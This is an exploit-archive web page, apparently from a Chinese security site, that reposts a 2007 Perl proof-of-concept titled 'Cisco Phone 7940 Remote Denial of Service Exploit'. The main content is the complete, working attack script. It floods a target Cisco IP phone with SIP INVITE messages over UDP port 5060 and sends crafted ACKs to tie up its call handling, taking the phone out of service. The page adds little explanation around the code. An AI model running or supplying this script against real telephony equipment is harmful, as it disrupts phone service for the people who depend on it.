首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Cisco Phone 7940 Remote Denial of Service Exploit 来源：http://madynes.loria.fr 作者：Humberto 发布时间：2007-12-06   #!/usr/bin/perl ############################### # Vulnerabily discovered using KiF ~ Kiph # # Authors: # Humberto J. Abdelnur (Ph.D Student) # Radu State (Ph.D) # Olivier Festor (Ph.D) # # Madynes Team, LORIA - INRIA Lorraine # http://madynes.loria.fr ############################### use IO::Socket::INET; use String::Random; die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>" unless ($ARGV[3]); $targetUser = $ARGV[1]; $targetIP = $ARGV[0]; $attackerUser = $ARGV[3]; $attackerIP= $ARGV[2]; $socket=new IO::Socket::INET->new( Proto=>'udp', PeerPort=>5060, PeerAddr=>$targetIP, LocalPort=>5060); $foo = new String::Random; $flag = 0; @calls; $threads = 0; while ($flag == 0){ $callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP"; $cseq = $foo->randregex('\d\d\d\d'); $msg = "INVITE sip:$targetIP SIP/2.0\r Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r From: <sip:$attackerUser\@$attackerIP>;tag=1\r To: <sip:$targetUser\@$targetIP>\r Call-ID:$callid\r CSeq: $cseq INVITE\r Max-Forwards: 70\r Contact: <sip:$attackerUser\@$attackerIP>\r Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r Content-Length: 0\r \r "; $socket->send($msg); $socket->recv($text,1024,0); if ($text =~ /^SIP\/2.0 100(.\r\n)*/ ){ push(@calls, $callid); sleep(1); }elsif ($text =~ /^SIP\/2.0 486(.\r\n)*/ ){ if ($thread == 0){ $thread = scalar(@calls); } while (scalar(@calls) ge $thread){ $toTag = $cseq= $callid= $text; $toTag =~ s/^(.*\r\n)*(To|t):(.*?>)(;.*?)?\r\n(.*\r\n)*/\4/; $callid =~ s/^(.*\r\n)*Call-ID:(.*)\r\n(.*\r\n)*/\2/; $cseq =~ s/^(.*\r\n)*CSeq: (.*?) (.*?)\r\n(.*\r\n)*/\2/; $msg = "ACK sip:$targetIP SIP/2.0\r Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r From: <sip:$attackerUser\@$attackerIP>;tag=1\r To: <sip:$targetUser\@$targetIP>$toTag\r Call-ID:$callid\r CSeq: $cseq ACK\r Contact: <sip:$attackerUser\@$attackerIP>\r Content-Length: 0\r \r "; $socket->send($msg); $i= 0; while ($i < scalar(@calls)){ if (@calls[$i] eq $callid){ delete @calls[$i]; }else{ $i += 1; } } if (scalar(@calls) ge $thread){ $socket->recv($text,1024,0); } } } }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Apple Mac OS X 10.5.0 (leopard ·Send ICMP Nasty Garbage (sing) ·Apple Mac OS X xnu <= 1228.0 L ·Media Player Classic 6.4.9 MP4 ·VLC 0.86 < 0.86d ActiveX Remot ·Windows Media Player 6.4 MP4 F ·RealPlayer 11 Malformed AU Fil ·Nullsoft Winamp 5.32 MP4 tags ·Windows Media Player AIFF Divi ·MonAlbum 0.87 Upload Shell / P ·Seditio CMS <= 121 Remote SQL ·Online Media Technologies AVSM   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved